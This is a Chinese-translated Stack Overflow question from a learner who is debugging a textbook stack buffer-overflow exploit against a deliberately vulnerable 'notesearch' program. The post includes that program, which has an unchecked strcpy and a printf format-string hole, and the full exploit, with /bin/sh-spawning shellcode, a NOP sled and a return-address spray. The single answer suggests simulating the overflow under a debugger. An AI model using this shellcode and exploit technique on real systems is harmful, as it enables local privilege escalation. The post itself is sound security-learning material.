我购买了这本书,名为“黑客,利用的艺术”,其中有一个程序是来自书中先前出现的程序的缓冲区溢出漏洞利用。我遇到了一些问题。首先,如果我尝试运行该程序,我会遇到段错误(即使作者运行了与我完全相同的命令,并且他没有遇到任何问题)我的第二个问题是,我认为作者做了一个糟糕的工作解释到底发生了什么。我很困惑这个漏洞是如何确定的 1) 确定偏移值 2) 使用 NOP sled 查找返回地址(这是如何工作的) 3) shellcode 如何说明正在发生的事情/它说什么/我如何读取它。
被利用的程序的代码是:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include "hacking.h" //Just an error checked malloc and an error message/exit function
#define FILENAME "/var/notes"
void fatal(char *);
int print_notes(int, int, char *);
int find_user_note(int, int);
int search_note(char *, char *);
int main(int argc, char *argv[]) {
int fd, userid, printing = 1;
char searchstring[100];
if (argc > 1)
strcpy(searchstring, argv[1]);
else
searchstring[0] = 0;
userid = getuid();
fd = open(FILENAME, O_RDONLY);
if(fd == -1) {
fatal("in main opening file");
}
while(printing)
printing = print_notes(fd, userid, searchstring);
printf("-------[ end of note data ]-------\n");
close(fd);
}
// A function to print the notes for a given uid that match an optional searchstring
// Returns 0 at end of file, 1 if still more notes
int print_notes(int fd, int uid, char *searchstring){
int note_length;
char byte = 0;
char note_buffer[100];
note_length = find_user_note(fd, uid);
if(note_length == -1) //If end of file reached
return 0; // Return 0;
read(fd, note_buffer, note_length); // Read More Data
note_buffer[note_length] = 0; // Terminate the String
if(search_note(note_buffer, searchstring)) //If searchstring found
printf(note_buffer); //Print the note
return 1;
}
// A function to find the next note for a given userID
// Returns -1 if the end of the file is reached
// Otherwise, it returns the length of the found note
int find_user_note(int fd, int user_uid) {
int note_uid = -1;
unsigned char byte;
int length;
while(note_uid != user_uid) { // Loop unitl a note for user_uid is found
if(read(fd, ¬e_uid, 4) != 4) // Read the uid data
return -1; // If 4 bytes arent read, return end of file code
if(read(fd, &byte, 1) != 1) //Read the newline separtor
return -1;
byte = length = 0;
while(byte != '\n') { // Figure out how many bytes to the end of line
if(read(fd, &byte, 1) != 1) // Read Single byte
return -1; // If byte isn't read, return end of file code
length++;
}
}
lseek(fd, length * -1, SEEK_CUR); // Rewind file by reading length bytes
printf("[DEBUG] found a %i byte note for user id %i\n", length, note_uid);
return length;
}
//A function to search a note for a given keyword
// Returns 1 if a match is found, 0 if there is no match
int search_note(char *note, char *keyword){
int i, keyword_length, match=0;
keyword_length = strlen(keyword);
if(keyword_length == 0) // If there is no searchstring
return 1; //Always match
for(i=0; i < strlen(note); i++){ // Iterate over bytes in note
if(note[i] == keyword[match]) // If byte matches keyword
match++; // Get ready to check nexy byte
else {
if(note[i] == keyword[match]) // If byte matches keyword
match = 1; // Start the match count at 1
else
match = 0; // Otherwise its zero
}
if(match == keyword_length) // If there is a full match
return 1; // return match
}
return 0; // return not matched
}
The exploit that is included is:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x73\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset = 270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); //Zero out the new memory
strcpy(command, "./notesearch \'");
buffer = command + strlen(command); // Set buffer at the end
if(argc > 1) //Set offset
offset = atoi(argv[1]);
ret = (unsigned int)&i - offset; //Set return address
for(i=0; i <160; i+=4) //Fill buffer with return addres
*((unsigned int *)(buffer + i)) = ret;
memset(buffer, 0x90, 60); //Build NOP sled
memcpy(buffer+60, shellcode, sizeof(shellcode) -1);
strcat(command, "\'");
system(command); //Run Exploit
free (command);
}
请注意该代码:我在分配 i - 偏移地址的行上收到警告。我很确定这是因为我使用的是 64 位机器,指针有 8 个字节,而 unsigned int 只有 4 个字节。为了解决这个问题,我将其类型转换为 long unsigned int。我不确定这是否是好的做法,但当我错了时请纠正我。 所以我把它改成了:
ret = (unsigned int)&i - offset; //Set return address[/code]
我使用gdb来分析发生了什么,我发现段错误发生在线路中
system(command); // Run Exploit
我还使用 gdb 彻底检查了程序中所有变量地址的内存,并且我注意到,当本书的作者检查命令变量的内容时(虽然其中有 shellcode),他的输出显示了一堆古怪的字符,但我的输出显示了数字和斜杠。为什么会有差异?
我的主要观点是,我不知道如何阻止此段错误的发生,但仍然让此漏洞正常工作。如果有人能够帮助我那就太好了。如果有人需要更多信息,我很乐意提供。
PS-我正在运行 kali linix 64 位,如果(如果这可以帮助您确定某些内容)
编辑导致段错误的行是:
*((unsigned int*)(buffer+i)) = ret;
最佳答案
您可以使用如下方式模拟缓冲区溢出:
char big_buffer[10000];
char *searchstring = big_buffer;
char *overflow = big_buffer + 1000;
memset(big_buffer, 0xff, 10000 * sizeof(char));
memset(searchstring, 0, 100);
然后观察调试器中的溢出区域以查看溢出情况。
关于c - 需要帮助了解缓冲区溢出及其利用,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/34347274/